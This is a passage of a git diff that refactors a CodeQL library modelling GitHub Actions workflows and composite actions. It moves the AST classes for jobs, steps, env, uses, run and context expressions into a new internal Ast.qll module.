> 0 and - sl = loc.getStartLine() and - el = loc.getEndLine() and - sc = loc.getStartColumn() and - ec = loc.getEndColumn() - or - // eg: - // - run: | - // echo "hello" - // - run: | - // echo "hello" - // echo "bye" - style = "|" and - exists(int r | - ( - r > 0 and - this.partialLineLengthSum(r - 1) < exprOffset and - this.partialLineLengthSum(r) >= exprOffset and - sl = loc.getStartLine() + r + 1 and - el = sl and - sc = - n.getKeyNode().getLocation().getStartColumn() + exprOffset - - this.partialLineLengthSum(r - 1) + 2 - 1 and - ec = sc + rawExpression.length() - 1 - or - r = 0 and - this.partialLineLengthSum(r) > exprOffset and - sl = loc.getStartLine() + r + 1 and - el = sl and - sc = n.getKeyNode().getLocation().getStartColumn() + 2 + exprOffset and - ec = sc + rawExpression.length() - 1 - ) - ) - or - // eg: - // - run: > - // echo "hello" - // - run: > - // echo "hello" - // echo "hello" - style = ">" and - sl = loc.getStartLine() + 1 and - el = loc.getEndLine() and - sc = n.getKeyNode().getLocation().getStartColumn() and - ec = loc.getEndColumn() - ) - } - - override Location getLocation() { - exists(Location loc | - this.hasLocationInfo(loc.getFile().getAbsolutePath(), loc.getStartLine(), - loc.getStartColumn(), loc.getEndLine(), loc.getEndColumn()) and - result = loc - ) - } - - predicate hasLocationInfo(string path, int sl, int sc, int el, int ec) { - path = n.asYamlNode().getFile().getAbsolutePath() and - this.expressionLocation(sl, sc, el, ec) - } - - override File getFile() { result = n.asYamlNode().getFile() } -} - -/** - * Base class for the AST tree. Based on YamlNode from the Yaml library. - */ -class WorkflowNode extends AstNode, TWorflowNode { - YamlNode n; - - WorkflowNode() { this = TWorflowNode(n) } - - override AstNode getParentNode() { result = TWorflowNode(n.getParentNode()) } - - override AstNode getAChildNode() { - result = TWorflowNode(n.getAChildNode()) - or - exists(ExpressionNode e | e.getParentNode() = this | result = e) - } - - override string getAPrimaryQlClass() { result = n.getAPrimaryQlClass() } - - override Location getLocation() { result = n.getLocation() } - - override File getFile() { result = n.getFile() } - - YamlNode asYamlNode() { result = n } - - YamlMapping asYamlMapping() { result = n } - - override string toString() { result = n.toString() } } /** A common class for `env` in workflow, job or step. */ -abstract class Env extends WorkflowNode { } +abstract class Env extends AstNode instanceof EnvImpl { + /** Gets an environment variable value given its name. */ + ScalarValueImpl getEnvVarValue(string name) { result = super.getEnvVarValue(name) } -/** A workflow level `env` mapping. */ -class WorkflowEnv extends Env { - Workflow workflow; + /** Gets an environment variable value. */ + ScalarValueImpl getAnEnvVarValue() { result = super.getAnEnvVarValue() } - WorkflowEnv() { - n instanceof YamlMapping and - workflow.asYamlMapping().lookup("env") = this.asYamlNode() - } + /** Gets an environment variable expressin given its name. */ + ExpressionImpl getEnvVarExpr(string name) { result = super.getEnvVarExpr(name) } - /** Gets the workflow this field belongs to. */ - Workflow getWorkflow() { result = workflow } -} - -/** A job level `env` mapping. */ -class JobEnv extends Env { - Job job; - - JobEnv() { job.asYamlMapping().lookup("env") = this.asYamlNode() } - - /** Gets the job this field belongs to. */ - Job getJob() { result = job } -} - -/** A step level `env` mapping. */ -class StepEnv extends Env { - Step step; - - StepEnv() { step.asYamlMapping().lookup("env") = this.asYamlNode() } - - /** Gets the step this field belongs to. */ - Step getStep() { result = step } + /** Gets an environment variable expression. */ + ExpressionImpl getAnEnvVarExpr() { result = super.getAnEnvVarExpr() } } /** * A custom composite action. This is a mapping at the top level of an Actions YAML action file. * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions. */ -class CompositeAction extends WorkflowNode { - //class CompositeAction extends WorkflowNode, YamlDocument, YamlMapping { - CompositeAction() { - n instanceof YamlDocument and - n instanceof YamlMapping and - this.getFile().getBaseName() = ["action.yml", "action.yaml"] and - this.asYamlMapping().lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = - "composite" - } - - /** Gets the `runs` mapping. */ - Runs getRuns() { result.asYamlNode() = this.asYamlMapping().lookup("runs") } +class CompositeAction extends AstNode instanceof CompositeActionImpl { + Runs getRuns() { result = super.getRuns() } - Outputs getOutputs() { result.asYamlNode() = this.asYamlMapping().lookup("outputs") } + Outputs getOutputs() { result = super.getOutputs() } - ExpressionNode getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + Expression getAnOutputExpr() { result = super.getAnOutputExpr() } - ExpressionNode getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + Expression getOutputExpr(string outputName) { result = super.getOutputExpr(outputName) } - Input getAnInput() { - this.asYamlMapping().lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) - } + Input getAnInput() { result = super.getAnInput() } - Input getInput(string name) { - this.asYamlMapping().lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) and - result.asYamlNode().(YamlString).getValue() = name - } + Input getInput(string inputName) { result = super.getInput(inputName) } } /** * An `runs` mapping in a custom composite action YAML. * See https://docs.github.com/en/actions/creating-actions/metadata-syntax-for-github-actions#runs */ -class Runs extends WorkflowNode { - CompositeAction action; +class Runs extends AstNode instanceof RunsImpl { + CompositeAction getAction() { result = super.getAction() } - Runs() { - n instanceof YamlMapping and - action.asYamlMapping().lookup("runs") = this.asYamlNode() - } + Step getAStep() { result = super.getAStep() } - /** Gets the action that this `runs` mapping is in. */ - CompositeAction getAction() { result = action } - - /** Gets any steps that are defined within this job. */ - Step getAStep() { - result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(_) - } - - /** Gets the step at the given index within this job. */ - Step getStep(int i) { - result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(i) - } + Step getStep(int i) { result = super.getStep(i) } } /** * An Actions workflow. This is a mapping at the top level of an Actions YAML workflow file. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions. */ -class Workflow extends WorkflowNode { - Workflow() { n instanceof YamlDocument and n instanceof YamlMapping } +class Workflow extends AstNode instanceof WorkflowImpl { + Env getEnv() { result = super.getEnv() } - /** Gets the `jobs` mapping from job IDs to job definitions in this workflow. */ - YamlMapping getJobs() { result = this.asYamlMapping().lookup("jobs") } + string getName() { result = super.getName() } - /** Gets the 'global' `env` mapping in this workflow. */ - WorkflowEnv getEnv() { result.asYamlNode() = this.asYamlMapping().lookup("env") } + Job getAJob() { result = super.getAJob() } - /** Gets the name of the workflow. */ - string getName() { result = this.asYamlMapping().lookup("name").(YamlString).getValue() } + Job getJob(string jobId) { result = super.getJob(jobId) } - /** Gets the job within this workflow with the given job ID. */ - Job getJob(string jobId) { result.getWorkflow() = this and result.getId() = jobId } + predicate hasTriggerEvent(string trigger) { super.hasTriggerEvent(trigger) } - /** Gets a job within this workflow */ - Job getAJob() { result = this.getJob(_) } + string getATriggerEvent() { result = super.getATriggerEvent() } - predicate hasTriggerEvent(string trigger) { - exists(YamlNode y | - y = this.asYamlMapping().lookup("on").(YamlMappingLikeNode).getNode(trigger) - ) - } - - string getATriggerEvent() { - exists(YamlNode y | y = this.asYamlMapping().lookup("on").(YamlMappingLikeNode).getNode(result)) - } + Permissions getPermissions() { result = super.getPermissions() } - Permissions getPermissions() { result.asYamlNode() = this.asYamlMapping().lookup("permissions") } - - Strategy getStrategy() { result.asYamlNode() = this.asYamlMapping().lookup("strategy") } + Strategy getStrategy() { result = super.getStrategy() } } -class ReusableWorkflow extends Workflow { - YamlValue workflow_call; - - ReusableWorkflow() { - n instanceof YamlMapping and - this.asYamlMapping().lookup("on").(YamlMappingLikeNode).getNode("workflow_call") = workflow_call - } - - Outputs getOutputs() { result.asYamlNode() = workflow_call.(YamlMapping).lookup("outputs") } +class ReusableWorkflow extends Workflow instanceof ReusableWorkflowImpl { + Outputs getOutputs() { result = super.getOutputs() } - ExpressionNode getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } + Expression getAnOutputExpr() { result = super.getAnOutputExpr() } - ExpressionNode getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } + Expression getOutputExpr(string outputName) { result = super.getOutputExpr(outputName) } - Input getAnInput() { - workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) - } + Input getAnInput() { result = super.getAnInput() } - Input getInput(string name) { - workflow_call.(YamlMapping).lookup("inputs").(YamlMapping).maps(result.asYamlNode(), _) and - result.asYamlNode().(YamlString).getValue() = name - } + Input getInput(string inputName) { result = super.getInput(inputName) } } -class Input extends WorkflowNode { - YamlMapping parent; +class Input extends AstNode instanceof InputImpl { } - Input() { parent.lookup("inputs").(YamlMapping).maps(this.asYamlNode(), _) } -} - -class Outputs extends WorkflowNode { - YamlMapping parent; - - Outputs() { - n instanceof YamlMapping and - parent.lookup("outputs") = this.asYamlNode() - } - - /** - * Gets an output expression. - */ - ExpressionNode getAnOutputExpr() { result = this.getOutputExpr(_) } - - /** - * Gets a specific output expression by name. - */ - ExpressionNode getOutputExpr(string name) { - exists(StringValue l | - l.getAnExpression() = result and - ( - this.asYamlMapping().lookup(name).(YamlMapping).lookup("value") = l.asYamlNode() or - this.asYamlMapping().lookup(name) = l.asYamlNode() - ) - ) - } +class Outputs extends AstNode instanceof OutputsImpl { + Expression getAnOutputExpr() { result = super.getAnOutputExpr() } - string getAnOutputName() { - this.asYamlMapping().maps(any(YamlString s | s.getValue() = result), _) - } + Expression getOutputExpr(string outputName) { result = super.getOutputExpr(outputName) } + // TODO: REMOVE override string toString() { result = "Job outputs node" } } -class Permissions extends WorkflowNode { - YamlMapping parent; - - Permissions() { - n instanceof YamlMapping and - parent.lookup("permissions") = this.asYamlNode() - } -} - -class Strategy extends WorkflowNode { - YamlMapping parent; +class Permissions extends AstNode instanceof PermissionsImpl { } - Strategy() { - n instanceof YamlMapping and - parent.lookup("strategy") = this.asYamlNode() - } +class Strategy extends AstNode instanceof StrategyImpl { + Expression getMatrixVarExpr(string varName) { result = super.getMatrixVarExpr(varName) } - /** - * Gets a specific matric expression (YamlMapping) by name. - */ - StringValue getMatrixVar(string name) { - this.asYamlMapping().lookup("matrix").(YamlMapping).lookup(name) = result.asYamlNode() - } - - /** - * Gets a specific matric expression (YamlMapping) by name. - */ - StringValue getAMatrixVar() { - this.asYamlMapping().lookup("matrix").(YamlMapping).lookup(_) = result.asYamlNode() - } + Expression getAMatrixVarExpr() { result = super.getAMatrixVarExpr() } } /** * https://docs.github.com/en/actions/using-workflows/workflow-syntax-for-github-actions#jobsjob_idneeds */ -class Needs extends WorkflowNode { - Job job; - - Needs() { - n instanceof YamlMappingLikeNode and - job.asYamlMapping().lookup("needs") = this.asYamlNode() - } - - Job getJob() { result = job } - - Job getANeededJob() { - result.getId() = this.asYamlNode().(YamlMappingLikeNode).getNode(_).(YamlString).getValue() and - result.getFile() = job.getFile() - } +class Needs extends AstNode instanceof NeedsImpl { + Job getANeededJob() { result = super.getANeededJob() } } /** * An Actions job within a workflow. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobs. */ -class Job extends WorkflowNode { - string jobId; - Workflow workflow; +abstract class Job extends AstNode instanceof JobImpl { + string getId() { result = super.getId() } - Job() { - n instanceof YamlMapping and - this.asYamlNode() = workflow.getJobs().lookup(jobId) - } + Workflow getWorkflow() { result = super.getWorkflow() } - /** - * Gets the ID of this job, as a string. - * This is the job's key within the `jobs` mapping. - */ - string getId() { result = jobId } + Job getANeededJob() { result = super.getANeededJob() } - /** Gets any steps that are defined within this job. */ - Step getAStep() { - result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(_) - } + Outputs getOutputs() { result = super.getOutputs() } - /** Gets the step at the given index within this job. */ - Step getStep(int i) { - result.asYamlNode() = this.asYamlMapping().lookup("steps").(YamlSequence).getElementNode(i) - } + Expression getAnOutputExpr() { result = super.getAnOutputExpr() } - /** Gets the workflow this job belongs to. */ - Workflow getWorkflow() { result = workflow } - - /** - * Gets a needed job. - * eg: - * - needs: [job1, job2] - */ - Job getANeededJob() { - exists(Needs needs | - needs.getJob() = this and - result = needs.getANeededJob() - ) - } + Expression getOutputExpr(string outputName) { result = super.getOutputExpr(outputName) } - /** - * Gets the declaration of the outputs for the job. - * eg: - * out1: ${steps.foo.bar} - * out2: ${steps.foo.baz} - */ - Outputs getOutputs() { result.asYamlNode() = this.asYamlMapping().lookup("outputs") } - - ExpressionNode getAnOutputExpr() { result = this.getOutputs().getAnOutputExpr() } - - ExpressionNode getOutputExpr(string name) { result = this.getOutputs().getOutputExpr(name) } - - /** - * Reusable workflow jobs may have Uses children - * eg: - * call-job: - * uses: ./.github/workflows/reusable_workflow.yml - * with: - * arg1: value1 - */ - UsesJob getUses() { result.getJob() = this } - - predicate usesReusableWorkflow() { - this.asYamlMapping().maps(any(YamlString s | s.getValue() = "uses"), _) - } + Env getEnv() { result = super.getEnv() } + + If getIf() { result = super.getIf() } - If getIf() { result.asYamlNode() = this.asYamlMapping().lookup("if") } + Permissions getPermissions() { result = super.getPermissions() } - Permissions getPermissions() { result.asYamlNode() = this.asYamlMapping().lookup("permissions") } + Strategy getStrategy() { result = super.getStrategy() } +} - Strategy getStrategy() { result.asYamlNode() = this.asYamlMapping().lookup("strategy") } +class LocalJob extends Job instanceof LocalJobImpl { + Step getAStep() { result = super.getAStep() } - override string toString() { result = "Job: " + jobId } + Step getStep(int i) { result = super.getStep(i) } } /** * A step within an Actions job. * See https://docs.github.com/en/actions/reference/workflow-syntax-for-github-actions#jobsjob_idsteps. */ -class Step extends WorkflowNode { - YamlMapping parent; +class Step extends AstNode instanceof StepImpl { + string getId() { result = super.getId() } - Step() { parent.lookup("steps").(YamlSequence).getElementNode(_) = this.asYamlNode() } + Env getEnv() { result = super.getEnv() } - /** Gets the ID of this step, if any. */ - string getId() { result = this.asYamlMapping().lookup("id").(YamlString).getValue() } - - /** Gets the `job` this step belongs to, if the step belongs to a `job` in a workflow. Has no result if the step belongs to `runs` in a custom composite action. */ - Job getJob() { result.asYamlNode() = parent } - - /** Gets the value of the `if` field in this step, if any. */ - If getIf() { result.asYamlNode() = this.asYamlMapping().lookup("if") } + If getIf() { result = super.getIf() } } /** * An If node representing a conditional statement. */ -class If extends WorkflowNode { - WorkflowNode parent; - - If() { - (parent instanceof Step or parent instanceof Job) and - parent.asYamlMapping().lookup("if") = this.asYamlNode() - } - - WorkflowNode getEnclosingNode() { result = parent } - - string getCondition() { result = this.asYamlNode().(YamlScalar).getValue() } -} - -/** - * Abstract class representing a call to a 3rd party action or reusable workflow. - */ -abstract class Uses extends WorkflowNode { - abstract string getCallee(); - - abstract string getVersion(); - - abstract ExpressionNode getArgumentExpr(string key); - - override string toString() { result = "Uses Step" } +class If extends AstNode instanceof IfImpl { + string getCondition() { result = super.getCondition() } } -/** - * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. - * The capture groups are: - * 1: The owner of the repository where the Action comes from, e.g. `actions` in `actions/checkout@v2` - * 2: The name of the repository where the Action comes from, e.g. `checkout` in `actions/checkout@v2`. - * 3: The version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. - */ -private string usesParser() { result = "([^/]+)/([^/@]+)@(.+)" } +abstract class Uses extends AstNode instanceof UsesImpl { + string getCallee() { result = super.getCallee() } -/** - * A Uses step represents a call to an action that is defined in a GitHub repository. - */ -class UsesStep extends Step, Uses { - YamlScalar uses; - - UsesStep() { this.asYamlMapping().maps(any(YamlScalar s | s.getValue() = "uses"), uses) } - - /** Gets the owner and name of the repository where the Action comes from, e.g. `actions/checkout` in `actions/checkout@v2`. */ - override string getCallee() { - result = - ( - uses.getValue().regexpCapture(usesParser(), 1) + "/" + - uses.getValue().regexpCapture(usesParser(), 2) - ).toLowerCase() - } - - /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ - override string getVersion() { result = uses.getValue().regexpCapture(usesParser(), 3) } + string getVersion() { result = super.getVersion() } - override Expression getArgumentExpr(string key) { - exists(StringValue l | - l.asYamlNode() = this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) and - result = l.getAnExpression() - ) - } - - override string toString() { - if exists(this.getId()) then result = "Uses Step: " + this.getId() else result = "Uses Step" - } + Expression getArgumentExpr(string argName) { result = super.getArgumentExpr(argName) } } -/** - * A Uses step represents a call to an action that is defined in a GitHub repository. - */ -class UsesJob extends Uses { - UsesJob() { - this instanceof Job and - this.asYamlMapping().maps(any(YamlString s | s.getValue() = "uses"), _) - } - - Job getJob() { result = this } - - /** - * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. - * local repo: octo-org/this-repo/.github/workflows/workflow-1.yml@172239021f7ba04fe7327647b213799853a9eb89 - * local repo: ./.github/workflows/workflow-2.yml - * remote repo: octo-org/another-repo/.github/workflows/workflow.yml@v1 - */ - private string repoUsesParser() { result = "([^/]+)/([^/]+)/([^@]+)@(.+)" } - - private string pathUsesParser() { result = "\\./(.+)" } - - override string getCallee() { - exists(YamlString name | - this.asYamlMapping().lookup("uses") = name and - if name.getValue().matches("./%") - then result = name.getValue().regexpCapture(this.pathUsesParser(), 1) - else - result = - name.getValue().regexpCapture(this.repoUsesParser(), 1) + "/" + - name.getValue().regexpCapture(this.repoUsesParser(), 2) + "/" + - name.getValue().regexpCapture(this.repoUsesParser(), 3) - ) - } - - /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ - override string getVersion() { - exists(YamlString name | - this.asYamlMapping().lookup("uses") = name and - if not name.getValue().matches("\\.%") - then result = name.getValue().regexpCapture(this.repoUsesParser(), 4) - else none() - ) - } +class UsesStep extends Step, Uses instanceof UsesStepImpl { } - override ExpressionNode getArgumentExpr(string key) { - exists(StringValue l | - this.asYamlMapping().lookup("with").(YamlMapping).lookup(key) = l.asYamlNode() and - result = l.getAnExpression() - ) - } -} +class ExternalJob extends Job, Uses instanceof ExternalJobImpl { } /** * A `run` field within an Actions job step, which runs command-line programs using an operating system shell. * See https://docs.github.com/en/free-pro-team@latest/actions/reference/workflow-syntax-for-github-actions#jobsjob_idstepsrun. */ -class Run extends Step { - StringValue script; - - Run() { this.asYamlMapping().maps(any(YamlString s | s.getValue() = "run"), script.asYamlNode()) } - - StringValue getScript() { result = script } - - override string toString() { - if exists(this.getId()) then result = "Run Step: " + this.getId() else result = "Run Step" - } -} - -/** - * A YamlString part of a YamlSequence or YamlMapping values. - */ -class StringValue extends WorkflowNode { - YamlNode keyNode; - - StringValue() { - n instanceof YamlString and - exists(YamlCollection c | - c = keyNode and - ( - c instanceof YamlMapping and - //c.(YamlMapping).maps(_, this.asYamlNode()) - exists(int i | this.asYamlNode() = c.(YamlMapping).getValueNode(i)) - or - c instanceof YamlSequence and - c.(YamlSequence).getElementNode(_) = this.asYamlNode() - ) - ) - } - - string getValue() { result = this.asYamlNode().(YamlString).getValue() } +class Run extends Step instanceof RunImpl { + string getScript() { result = super.getScript() } - YamlNode getKeyNode() { result = keyNode } - - ExpressionNode getAnExpression() { result = this.getAChildNode() } -} - -/** - * Holds if `${{ e }}` is a GitHub Actions expression evaluated within this YAML string. - * See https://docs.github.com/en/free-pro-team@latest/actions/reference/context-and-expression-syntax-for-github-actions. - * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. - * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} - */ -string getASimpleReferenceExpression(StringValue node, int offset) { - // We use `regexpFind` to obtain *all* matches of `${{...}}`, - // not just the last (greedy match) or first (reluctant match). - result = - node.getValue() - .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, offset) - .regexpCapture("(\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+\\s*\\}\\})", 1) + Expression getAnScriptExpr() { result = super.getAnScriptExpr() } } -class Expression extends ExpressionNode { } +abstract class ContextExpression extends AstNode instanceof ContextExpressionImpl { + string getFieldName() { result = super.getFieldName() } -/** - * A ${{}} expression accessing a context variable such as steps, needs, jobs, env, inputs, or matrix. - * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability - */ -class ContextExpression extends Expression { - ContextExpression() { - expression - .regexpMatch([ - stepsCtxRegex(), needsCtxRegex(), jobsCtxRegex(), envCtxRegex(), inputsCtxRegex(), - matrixCtxRegex() - ]) - } - - abstract string getFieldName(); - - abstract AstNode getTarget(); -} - -private string stepsCtxRegex() { - result = wrapRegexp("steps\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") + AstNode getTarget() { result = super.getTarget() } } -private string needsCtxRegex() { - result = wrapRegexp("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") -} - -private string jobsCtxRegex() { - result = wrapRegexp("jobs\\.([A-Za-z0-9_-]+)\\.outputs\\.([A-Za-z0-9_-]+)") -} +class StepsExpression extends ContextExpression instanceof StepsExpressionImpl { } -private string envCtxRegex() { result = wrapRegexp("env\\.([A-Za-z0-9_-]+)") } +class NeedsExpression extends ContextExpression instanceof NeedsExpressionImpl { } -private string matrixCtxRegex() { result = wrapRegexp("matrix\\.([A-Za-z0-9_-]+)") } +class JobsExpression extends ContextExpression instanceof JobsExpressionImpl { } -private string inputsCtxRegex() { - result = wrapRegexp(["inputs\\.([A-Za-z0-9_-]+)", "github\\.event\\.inputs\\.([A-Za-z0-9_-]+)"]) -} +class InputsExpression extends ContextExpression instanceof InputsExpressionImpl { } -bindingset[regex] -private string wrapRegexp(string regex) { - result = ["\\b" + regex + "\\b", "fromJSON\\(" + regex + "\\)", "toJSON\\(" + regex + "\\)"] -} +class EnvExpression extends ContextExpression instanceof EnvExpressionImpl { } -/** - * Holds for an expression accesing the `steps` context. - * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability - * e.g. `${{ steps.changed-files.outputs.all_changed_files }}` - */ -class StepsExpression extends ContextExpression { - string stepId; - string fieldName; - - StepsExpression() { - expression.regexpMatch(stepsCtxRegex()) and - stepId = expression.regexpCapture(stepsCtxRegex(), 1) and - fieldName = expression.regexpCapture(stepsCtxRegex(), 2) - } - - override string getFieldName() { result = fieldName } - - override AstNode getTarget() { - this.getFile() = result.getFile() and - result.(Step).getId() = stepId - } -} - -/** - * Holds for an expression accesing the `needs` context. - * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability - * e.g. `${{ needs.job1.outputs.foo}}` - */ -class NeedsExpression extends ContextExpression { - Job neededJob; - string neededJobId; - string fieldName; - - NeedsExpression() { - expression.regexpMatch(needsCtxRegex()) and - neededJobId = expression.regexpCapture(needsCtxRegex(), 1) and - fieldName = expression.regexpCapture(needsCtxRegex(), 2) and - neededJob.getId() = neededJobId - } - - predicate usesReusableWorkflow() { neededJob.usesReusableWorkflow() } - - override string getFieldName() { result = fieldName } - - override AstNode getTarget() { - neededJob.getFile() = this.getFile() and - this.getJob().getANeededJob() = neededJob and - ( - // regular jobs - neededJob.getOutputs() = result - or - // reusable workflow calling jobs - neededJob.getUses() = result - ) - } -} - -/** - * Holds for an expression accesing the `jobs` context. - * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability - * e.g. `${{ jobs.job1.outputs.foo}}` (within reusable workflows) - */ -class JobsExpression extends ContextExpression { - string jobId; - string fieldName; - - JobsExpression() { - expression.regexpMatch(jobsCtxRegex()) and - jobId = expression.regexpCapture(jobsCtxRegex(), 1) and - fieldName = expression.regexpCapture(jobsCtxRegex(), 2) - } - - override string getFieldName() { result = fieldName } - - override AstNode getTarget() { - exists(Job job | - job.getId() = jobId and - job.getFile() = this.getFile() and - job.getOutputs() = result - ) - } -} - -/** - * Holds for an expression the `inputs` context. - * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability - * e.g. `${{ inputs.foo }}` - */ -class InputsExpression extends ContextExpression { - string fieldName; - - InputsExpression() { - expression.regexpMatch(inputsCtxRegex()) and - fieldName = expression.regexpCapture(inputsCtxRegex(), 1) - } - - override string getFieldName() { result = fieldName } - - override AstNode getTarget() { - result.getFile() = this.getFile() and - ( - exists(ReusableWorkflow w | w.getInput(fieldName) = result) - or - exists(CompositeAction a | a.getInput(fieldName) = result) - ) - } -} - -/** - * Holds for an expression accesing the `env` context. - * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability - * e.g. `${{ env.foo }}` - */ -class EnvExpression extends ContextExpression { - string fieldName; - - EnvExpression() { - expression.regexpMatch(envCtxRegex()) and - fieldName = expression.regexpCapture(envCtxRegex(), 1) - } - - override string getFieldName() { result = fieldName } - - override AstNode getTarget() { - exists(WorkflowNode s | - s.getInScopeEnvVarExpr(fieldName) = result and - s.getAChildNode*() = this - ) - } -} - -/** - * Holds for an expression accesing the `matrix` context. - * https://docs.github.com/en/actions/learn-github-actions/contexts#context-availability - * e.g. `${{ matrix.foo }}` - */ -class MatrixExpression extends ContextExpression { - string fieldName; - - MatrixExpression() { - expression.regexpMatch(matrixCtxRegex()) and - fieldName = expression.regexpCapture(matrixCtxRegex(), 1) - } - - override string getFieldName() { result = fieldName } - - override AstNode getTarget() { - exists(Workflow w | - w.getStrategy().getMatrixVar(fieldName) = result and - w.getAChildNode*() = this - ) - or - exists(Job j | - j.getStrategy().getMatrixVar(fieldName) = result and - j.getAChildNode*() = this - ) - } -} +class MatrixExpression extends ContextExpression instanceof MatrixExpressionImpl { } diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll new file mode 100644 index 000000000000..63b25229a588 --- /dev/null +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -0,0 +1,1001 @@ +private import codeql.actions.ast.internal.Yaml +private import codeql.Locations + +/** + * Gets the length of each line in the StringValue . + */ +bindingset[text] +int lineLength(string text, int idx) { + exists(string line | line = text.splitAt("\n", idx) and result = line.length() + 1) +} + +/** + * Gets the sum of the length of the lines up to the given index. + */ +bindingset[text] +int partialLineLengthSum(string text, int i) { + i in [0 .. count(text.splitAt("\n"))] and + result = sum(int j, int length | j in [0 .. i] and length = lineLength(text, j) | length) +} + +/** + * Holds if `${{ e }}` is a GitHub Actions expression evaluated within this YAML string. + * See https://docs.github.com/en/free-pro-team@latest/actions/reference/context-and-expression-syntax-for-github-actions. + * Only finds simple expressions like `${{ github.event.comment.body }}`, where the expression contains only alphanumeric characters, underscores, dots, or dashes. + * Does not identify more complicated expressions like `${{ fromJSON(env.time) }}`, or ${{ format('{{Hello {0}!}}', github.event.head_commit.author.name) }} + */ +string getASimpleReferenceExpression(YamlString s, int offset) { + // We use `regexpFind` to obtain *all* matches of `${{...}}`, + // not just the last (greedy match) or first (reluctant match). + result = + s.getValue() + .regexpFind("\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\(\\)\\.\\-]+\\s*\\}\\}", _, offset) + .regexpCapture("(\\$\\{\\{\\s*[A-Za-z0-9_\\[\\]\\*\\((\\)\\.\\-]+\\s*\\}\\})", 1) +} + +private newtype TAstNode = + TExpressionNode(YamlNode key, YamlScalar value, string raw, int exprOffset) { + raw = getASimpleReferenceExpression(value, exprOffset) and + exists(YamlMapping m | + ( + exists(int i | value = m.getValueNode(i) and key = m.getKeyNode(i)) + or + exists(int i | + m.getValueNode(i).(YamlSequence).getElementNode(_) = value and key = m.getKeyNode(i) + ) + ) + ) + } or + TCompositeAction(YamlMapping n) { + n instanceof YamlDocument and + n.getFile().getBaseName() = ["action.yml", "action.yaml"] and + n.lookup("runs").(YamlMapping).lookup("using").(YamlScalar).getValue() = "composite" + } or + TWorkflowNode(YamlMapping n) { + n instanceof YamlDocument and + n.lookup("jobs") instanceof YamlMapping + } or + TRunsNode(YamlMapping n) { exists(CompositeActionImpl a | a.getNode().lookup("runs") = n) } or + TInputsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("inputs") = n) } or + TInputNode(YamlValue n) { exists(YamlMapping m | m.lookup("inputs").(YamlMapping).maps(n, _)) } or + TOutputsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("outputs") = n) } or + TPermissionsNode(YamlMapping n) { exists(YamlMapping m | m.lookup("permissions") = n) } or + TStrategyNode(YamlMapping n) { exists(YamlMapping m | m.lookup("strategy") = n) } or + TNeedsNode(YamlMappingLikeNode n) { exists(YamlMapping m | m.lookup("needs") = n) } or + TJobNode(YamlMapping n) { exists(YamlMapping w | w.lookup("jobs").(YamlMapping).lookup(_) = n) } or + TStepNode(YamlMapping n) { + exists(YamlMapping m | m.lookup("steps").(YamlSequence).getElementNode(_) = n) + } or + TIfNode(YamlValue n) { exists(YamlMapping m | m.lookup("if") = n) } or + TEnvNode(YamlMapping n) { exists(YamlMapping m | m.lookup("env") = n) } or + TScalarValueNode(YamlScalar n) { + exists(YamlMapping m | m.maps(_, n) or m.lookup(_).(YamlSequence).getElementNode(_) = n) + } + +abstract class AstNodeImpl extends TAstNode { + abstract AstNodeImpl getAChildNode(); + + abstract AstNodeImpl getParentNode(); + + abstract string getAPrimaryQlClass(); + + abstract Location getLocation(); + + abstract YamlNode getNode(); + + abstract string toString(); + + /** + * Gets the enclosing Job. + */ + JobImpl getEnclosingJob() { result.getAChildNode*() = this.getParentNode() } + + /** + * Gets the enclosing workflow statement. + */ + WorkflowImpl getEnclosingWorkflow() { this = result.getAChildNode*() } + + /** + * Gets a environment variable expression by name in the scope of the current node. + */ + ExpressionImpl getInScopeEnvVarExpr(string name) { + exists(EnvImpl env | + env.getNode().maps(any(YamlScalar s | s.getValue() = name), result.getParentNode().getNode()) and + env.getParentNode().getAChildNode*() = this + ) + } +} + +class ScalarValueImpl extends AstNodeImpl, TScalarValueNode { + YamlScalar value; + + ScalarValueImpl() { this = TScalarValueNode(value) } + + override string toString() { result = value.getValue() } + + override ExpressionImpl getAChildNode() { result.getParentNode() = this } + + override 